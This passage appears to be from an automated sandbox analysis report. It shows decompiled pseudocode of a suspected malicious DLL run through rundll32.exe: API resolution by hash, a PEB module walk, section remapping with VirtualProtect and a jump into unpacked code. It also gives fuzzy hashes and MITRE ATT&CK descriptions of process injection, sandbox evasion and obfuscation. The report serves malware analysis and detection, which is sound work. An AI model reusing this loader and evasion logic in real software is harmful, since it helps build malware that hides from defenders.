											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6ec7d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6ec7d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6EC6E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6EC7306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6ec7d2e4 = 1;
					E6EC6F584( &(_t535[0x38]), 0);
					E6EC6F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6EC6F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6EC7306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6EC6F828( &(_t535[0xc]), E6EC6F4CC( &(_t535[8])) + 0x14);
								_t369 = E6EC6F4BC( &(_t535[0xc]), E6EC6F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6EC6F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6EC6F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6EC6F654( &(_t535[8]));
							E6EC6F654( &(_t535[0x164]));
							E6EC6F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6EC6F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6EC71D34(0x60a28c5c);
							_t290 = E6EC712EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6EC71C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6EC6D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6EC75CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6EC75D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6EC78E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6EC6F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6EC6BB44( &(_t535[0x110]));
							}
							E6EC6CFDC( &(_t535[0x104]));
							E6EC6CFDC(_t518);
							E6EC6CFDC( &(_t535[0x15c]));
							E6EC6CFDC( &(_t535[0x154]));
							E6EC790EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6EC6F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6EC790B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6EC6F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6EC6F4CC( &(_t535[0x44]));
								_t519 =  *(0x6ec7bd40 + _t381 * 4);
								_t531 = E6EC7907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6EC787E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6EC6F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6EC6F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6EC6F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6EC6F828( &(_t535[0x20]), E6EC6F4CC( &(_t535[0x1c])) + 8);
										E6EC6F4BC( &(_t535[0x20]), E6EC6F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6EC7317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6EC6F828( &(_t535[0x48]), _t535[0x70]);
									E6EC7317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6EC6F840( &(_t535[0x44]), _t563);
									E6EC6F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6EC7913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6EC79104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6EC6F654( &(_t535[0x144]));
									E6EC6F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6ec7d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6EC6F654( &(_t535[0x11c]));
							E6EC78E68(_t381,  &(_t535[0xd8]));
							E6EC6F654( &(_t535[0x1c]));
							E6EC6F654( &(_t535[0x44]));
							E6EC6F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6EC6F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6EC6F828( &(_t535[0x38]), E6EC6F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6EC6F4BC( &(_t535[0x38]), E6EC6F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6EC6F4BC( &(_t535[0xc]), _t62);
						_t455 = E6EC6F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6ec71448
0x6ec7144f
0x6ec71452
0x6ec71459
0x6ec71bdb
0x6ec71bdb
0x6ec7145f
0x6ec7146a
0x6ec719a9
0x6ec719ad
0x00000000
0x6ec71c2c
0x6ec719b3
0x6ec719b6
0x6ec719b9
0x6ec719c3
0x6ec719d2
0x6ec719d4
0x6ec719db
0x6ec71bc5
0x6ec71bc7
0x6ec71bca
0x6ec71bce
0x00000000
0x6ec71bce
0x6ec719ea
0x6ec719f5
0x6ec719fc
0x6ec719ff
0x6ec71a01
0x6ec71a04
0x6ec71a07
0x6ec71a0d
0x6ec71a1b
0x6ec71a2b
0x6ec71a50
0x6ec71a61
0x6ec71a64
0x6ec71a66
0x6ec71aca
0x6ec71acd
0x6ec71acd
0x6ec71acf
0x6ec71ad2
0x6ec71ad6
0x6ec71ad6
0x6ec71ada
0x00000000
0x00000000
0x6ec71ae7
0x6ec71aed
0x6ec71b21
0x6ec71b27
0x6ec71b29
0x6ec71bf8
0x6ec71c00
0x6ec71c03
0x6ec71c05
0x6ec71c1c
0x6ec71c1c
0x6ec71c07
0x6ec71c0b
0x6ec71c10
0x6ec71c10
0x6ec71c1e
0x6ec71c24
0x6ec71b43
0x6ec71b43
0x6ec71b45
0x6ec71b45
0x6ec71b47
0x6ec71b47
0x6ec71b4c
0x00000000
0x00000000
0x6ec71b4e
0x6ec71b4f
0x6ec71b52
0x6ec71b55
0x00000000
0x00000000
0x6ec71b61
0x6ec71b64
0x6ec71b66
0x6ec71b7d
0x6ec71b7d
0x6ec71b68
0x6ec71b6c
0x6ec71b71
0x6ec71b71
0x6ec71b8a
0x6ec71b8d
0x6ec71b96
0x6ec71b99
0x6ec71bbc
0x6ec71bc0
0x00000000
0x6ec71bc0
0x6ec71ba1
0x6ec71ba1
0x6ec71bad
0x6ec71bb0
0x6ec71bb9
0x00000000
0x6ec71bb9
0x6ec71b2f
0x6ec71b3f
0x6ec71b3f
0x6ec71b41
0x00000000
0x00000000
0x6ec71b37
0x6ec71b39
0x6ec71b39
0x00000000
0x6ec71b3f
0x6ec71aef
0x6ec71af7
0x6ec71b17
0x6ec71af9
0x6ec71af9
0x6ec71b01
0x6ec71b0a
0x6ec71b0a
0x6ec71b01
0x00000000
0x6ec71af7
0x6ec71a68
0x6ec71a6f
0x00000000
0x00000000
0x6ec71a7c
0x6ec71a82
0x6ec71a87
0x6ec71a8e
0x6ec71a92
0x6ec71aa7
0x6ec71aa9
0x6ec71aab
0x6ec71ab1
0x6ec71abf
0x6ec71abf
0x6ec71ac5
0x00000000
0x6ec71ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ec71a0f
0x6ec71a0f
0x6ec71a0f
0x6ec71a10
0x6ec71a13
0x6ec71a17
0x00000000
0x6ec71a2d
0x6ec71a30
0x6ec71a33
0x6ec71a3c
0x6ec71a3f
0x6ec71a40
0x6ec71a42
0x00000000
0x6ec7147d
0x6ec7147f
0x6ec71484
0x6ec7148f
0x6ec7149d
0x6ec714b0
0x6ec714bd
0x6ec714c6
0x6ec714ca
0x6ec714ce
0x6ec71516
0x6ec71516
0x6ec71518
0x6ec7151f
0x00000000
0x00000000
0x6ec71538
0x6ec71540
0x6ec71544
0x6ec71559
0x6ec7155d
0x6ec71561
0x6ec7156a
0x6ec71570
0x6ec71573
0x6ec71577
0x6ec7157f
0x6ec71581
0x6ec71585
0x6ec7158c
0x6ec71595
0x6ec71595
0x6ec71599
0x6ec715ae
0x6ec715c4
0x6ec715d1
0x6ec715d2
0x6ec715d2
0x6ec715d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6ec7158e
0x6ec7158e
0x6ec7158e
0x6ec7158f
0x6ec71590
0x00000000
0x6ec7158e
0x6ec71553
0x6ec71557
0x00000000
0x00000000
0x00000000
0x6ec715d8
0x6ec715d8
0x6ec715d9
0x6ec715dc
0x6ec715e6
0x6ec715e6
0x6ec715ea
0x6ec715f1
0x6ec7164c
0x6ec71651
0x6ec716a4
0x6ec716a4
0x6ec716a8
0x6ec716ac
0x6ec714d6
0x6ec714d9
0x6ec714de
0x6ec714e4
0x6ec714e7
0x6ec714ee
0x6ec714f2
0x6ec714f9
0x6ec71502
0x6ec71506
0x6ec7150a
0x6ec71510
0x00000000
0x00000000
0x00000000
0x6ec71510
0x6ec716b6
0x6ec716c2
0x6ec716cd
0x6ec716d4
0x6ec716dd
0x6ec716e7
0x6ec716e8
0x6ec716f6
0x6ec716fb
0x6ec716fc
0x6ec71709
0x6ec7170e
0x6ec71720
0x6ec71725
0x6ec7172a
0x6ec7173c
0x6ec7174e
0x6ec71753
0x6ec7175e
0x6ec71765
0x6ec7176a
0x6ec71772
0x6ec7177b
0x6ec7177b
0x6ec71787
0x6ec7178e
0x6ec7179a
0x6ec717a6
0x6ec717b4
0x6ec717c5
0x6ec717cc
0x6ec717d1
0x6ec717da
0x6ec717df
0x6ec717e1
0x6ec717e5
0x6ec717e9
0x6ec717f6
0x6ec71803
0x6ec71807
0x6ec7181b
0x6ec7181f
0x00000000
0x00000000
0x6ec71834
0x6ec71836
0x6ec7183e
0x6ec7183b
0x6ec7183b
0x6ec7183b
0x6ec71842
0x6ec71844
0x6ec7184a
0x6ec71850
0x6ec718ac
0x6ec718b5
0x6ec718b9
0x6ec718c6
0x6ec718cf
0x6ec718d4
0x6ec718d8
0x6ec718db
0x6ec7193c
0x6ec71952
0x6ec7195d
0x6ec7195e
0x6ec7195f
0x6ec71963
0x6ec71966
0x6ec71be6
0x6ec71be9
0x6ec71be9
0x00000000
0x6ec71966
0x6ec718e5
0x6ec718f5
0x6ec718fe
0x6ec71907
0x6ec71910
0x6ec71911
0x6ec71912
0x6ec71917
0x6ec7191f
0x6ec71927
0x00000000
0x00000000
0x00000000
0x6ec71929
0x6ec71859
0x6ec7185e
0x6ec71862
0x6ec71862
0x6ec71866
0x6ec71869
0x00000000
0x00000000
0x6ec7188a
0x6ec7188c
0x6ec71890
0x6ec71892
0x00000000
0x00000000
0x6ec71894
0x6ec7189b
0x6ec718a7
0x00000000
0x6ec718a7
0x6ec7186e
0x00000000
0x6ec7196c
0x6ec7196c
0x6ec7196d
0x6ec7197d
0x6ec71989
0x6ec71992
0x6ec7199b
0x6ec719a4
0x00000000
0x6ec719a4
0x6ec71653
0x6ec71655
0x6ec71657
0x6ec7165c
0x6ec71661
0x6ec71674
0x6ec7168a
0x6ec71693
0x6ec71694
0x6ec71694
0x6ec71696
0x6ec71697
0x6ec7169a
0x6ec7169e
0x00000000
0x6ec71657
0x6ec715f3
0x6ec715fd
0x6ec715fe
0x6ec715fe
0x6ec7160b
0x6ec71617
0x6ec71619
0x6ec7161b
0x6ec7161f
0x6ec7162f
0x6ec7162f
0x6ec71636
0x6ec71639
0x6ec7163a
0x6ec7163e
0x6ec71648
0x00000000
0x6ec71648

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d37dffa9c2a4c9a38965f5024489e818397f4bddc27bcf49d30614a45989c312
Instruction ID: 219773bc38376e19c589486d77a456bca197e131405857ac8f6018f4b25b0fdc
Opcode Fuzzy Hash: d37dffa9c2a4c9a38965f5024489e818397f4bddc27bcf49d30614a45989c312
Instruction Fuzzy Hash: 04326D711083458FDB24DFA8C8A0AABBBE8FF95304F108D2DE59587265FB70D949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EC66D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EC66D0C() {

				 *0x6ec7d280 = GetUserNameW;
				 *0x6EC7D284 = MessageBoxW;
				 *0x6EC7D288 = GetLastError;
				 *0x6EC7D28C = CreateFileA;
				 *0x6EC7D290 = DebugBreak;
				 *0x6EC7D294 = FlushFileBuffers;
				 *0x6EC7D298 = FreeEnvironmentStringsA;
				 *0x6EC7D29C = GetConsoleOutputCP;
				 *0x6EC7D2A0 = GetEnvironmentStrings;
				 *0x6EC7D2A4 = GetLocaleInfoA;
				 *0x6EC7D2A8 = GetStartupInfoA;
				 *0x6EC7D2AC = GetStringTypeA;
				 *0x6EC7D2B0 = HeapValidate;
				 *0x6EC7D2B4 = IsBadReadPtr;
				 *0x6EC7D2B8 = LCMapStringA;
				 *0x6EC7D2BC = LoadLibraryA;
				 *0x6EC7D2C0 = OutputDebugStringA;
				return 0x6ec7d280;
			}

0x6ec66d1d
0x6ec66d25
0x6ec66d28
0x6ec66d37
0x6ec66d3a
0x6ec66d49
0x6ec66d4c
0x6ec66d5b
0x6ec66d5e
0x6ec66d6d
0x6ec66d70
0x6ec66d7f
0x6ec66d82
0x6ec66d91
0x6ec66d94
0x6ec66da3
0x6ec66da6
0x6ec66da9

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a38008639de09cc175a5e7be882f05bf33ec9daf41a0491e5b05326da5f04a5d
Instruction ID: 5eb8504fe9db3dc5757e6d287d989dc37864c446d86d18243545209bfc6a642b
Opcode Fuzzy Hash: a38008639de09cc175a5e7be882f05bf33ec9daf41a0491e5b05326da5f04a5d
Instruction Fuzzy Hash: 9A11DFB8A15A20CF8B58CF0AD2908517BF1BBCE351312C9AAD82A8B365D734D845CF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4492 Parent PID: 1964 rundll32.exeCOMMON

Executed Functions

Function 0078141B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0078141B(long __ebx, void* __edi, long __esi, intOrPtr* _a4, intOrPtr _a814471233) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t141;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				intOrPtr _t186;
				unsigned int _t203;
				void* _t236;
				intOrPtr _t239;
				intOrPtr _t244;
				void* _t246;
				intOrPtr* _t250;
				intOrPtr _t258;
				DWORD* _t270;
				void* _t274;
				intOrPtr* _t277;
				intOrPtr* _t278;

				_t141 = _a4;
				_v20 = 0;
				_t246 =  *((intOrPtr*)(_t141 + 0x6c));
				 *0x784418 = 1;
				asm("movaps xmm0, [0x783010]");
				asm("movups [0x784428], xmm0");
				_v48 = _t141;
				_v52 =  *((intOrPtr*)(_t141 + 0x1c));
				_v56 =  *((intOrPtr*)(_v48 + 0x54));
				_v188 = _t246;
				_v184 =  *((intOrPtr*)(_t141 + 0x38));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t246;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __esi, __ebx, _t270); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x38));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00781E1E();
				E007822BF(_v68,  *((intOrPtr*)(_v48 + 0x3c)), _v56);
				E00781E1E( *((intOrPtr*)(_v48 + 0x3c)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t277 = _t274 - 0x8c;
				_t236 = _v68;
				_t258 =  *((intOrPtr*)(_t236 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t236;
				_v108 = _t258;
				if(_t258 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v60 != 0) {
					_v136 = 0;
					_v132 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_t203 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t203 >> 0x0000001e & 0x00000001;
						_v148 = _t203 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t174 + 0xc));
						_v184 =  *((intOrPtr*)(_v140 + 8));
						_v180 =  *((intOrPtr*)(0x784418 + (_v144 << 4) + (_v148 << 3) + ((_t203 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v136;
						_t186 =  *_v52();
						_t277 = _t277 - 0x10;
						_t244 = _v152 + 1;
						_v156 = _t186;
						_v136 = _t244;
						_v132 = _v140 + 0x28;
						if(_t244 == _v60) {
							goto L5;
						}
						_a814471233 = _a814471233 - 1;
					}
				}
				L5:
				 *_t277 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x48));
				_t159 = DisableThreadLibraryCalls(??);
				_t278 = _t277 - 4;
				_t239 =  *_v100;
				_v120 = _t159;
				_v124 = _t239;
				_v128 = _v68;
				if(_t239 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t250 = _v48;
				_v44 =  *((intOrPtr*)(_t250 + 0x5c));
				_v40 =  *((intOrPtr*)(_t250 + 0x60));
				_v36 =  *((intOrPtr*)(_t250 + 0x64));
				_v32 =  *_t250;
				_v28 =  *((intOrPtr*)(_t250 + 0x24));
				_v24 = _v116;
				 *_t278 = _t250;
				_v188 = 0;
				_v184 = 0x70;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x70;
				_v172 =  *((intOrPtr*)(_v128 + 0x28));
				E00781E1E();
				if(_v172 != 0) {
					_t277 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00781427
0x00781435
0x0078143c
0x0078143f
0x00781449
0x00781450
0x0078145a
0x00781460
0x00781469
0x00781472
0x00781475
0x00781479
0x00781481
0x00781488
0x0078148b
0x0078148e
0x00781491
0x00781494
0x007814ae
0x007814b4
0x007814b7
0x007814bf
0x007814c3
0x007814c6
0x007814c9
0x007814cc
0x007814cf
0x007814eb
0x00781508
0x0078152d
0x0078152f
0x00781538
0x0078153b
0x00781545
0x00781548
0x0078154b
0x0078154e
0x00781551
0x00781568
0x00781568
0x00781574
0x00781577
0x0078174d
0x00781753
0x007815f2
0x007815f2
0x0078160a
0x0078160d
0x0078161b
0x0078162c
0x00781658
0x0078165b
0x0078165f
0x00781663
0x0078166a
0x00781670
0x00781672
0x00781684
0x0078168c
0x00781692
0x00781698
0x0078169b
0x00000000
0x00000000
0x007816a5
0x007816a5
0x007815f2
0x00781599
0x007815a7
0x007815af
0x007815b2
0x007815b4
0x007815ba
0x007815c6
0x007815c9
0x007815cc
0x007815cf
0x007815ea
0x007815ea
0x007816d5
0x007816db
0x007816e1
0x007816e7
0x007816ec
0x007816f2
0x007816f8
0x007816fb
0x007816fe
0x00781706
0x0078170e
0x00781714
0x0078171a
0x00781720
0x00781726
0x00781734
0x0078158c
0x00781592
0x00781592
0x007816bf

APIs

VirtualProtect.KERNELBASE ref: 00781494
VirtualProtect.KERNELBASE ref: 0078152D

Strings

p, xrefs: 00781706

Memory Dump Source

Source File: 00000003.00000002.334349069.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: p
API String ID: 544645111-2181537457
Opcode ID: 43cd706c9e32cf8d1af20204d267b4127371e3566e9e38e4391951d68314ef52
Instruction ID: 09434317bfd18233fead05f0edf7ffc88a0087b879f4d9ab56acea5a71209370
Opcode Fuzzy Hash: 43cd706c9e32cf8d1af20204d267b4127371e3566e9e38e4391951d68314ef52
Instruction Fuzzy Hash: 4481AAB4E04218CFCB14DF99C880AADFBF1BF88300F65856AE959AB351D734A941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0078129E, Relevance: 1.4, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 007813A5

Memory Dump Source

Source File: 00000003.00000002.334349069.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ace062276d42d08900e6f24e87c0185923075743edc0e6fe2a42c76369fd47d
Instruction ID: 4625480d04b50d4f5aa6817aca5f6ee8c84467e66df5a272ea2cec52f43ab710
Opcode Fuzzy Hash: 1ace062276d42d08900e6f24e87c0185923075743edc0e6fe2a42c76369fd47d
Instruction Fuzzy Hash: 0841E2B5E052199FDB04DFA8C4946AEBBF1FF48310F15856EE848AB340D379A841CF95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
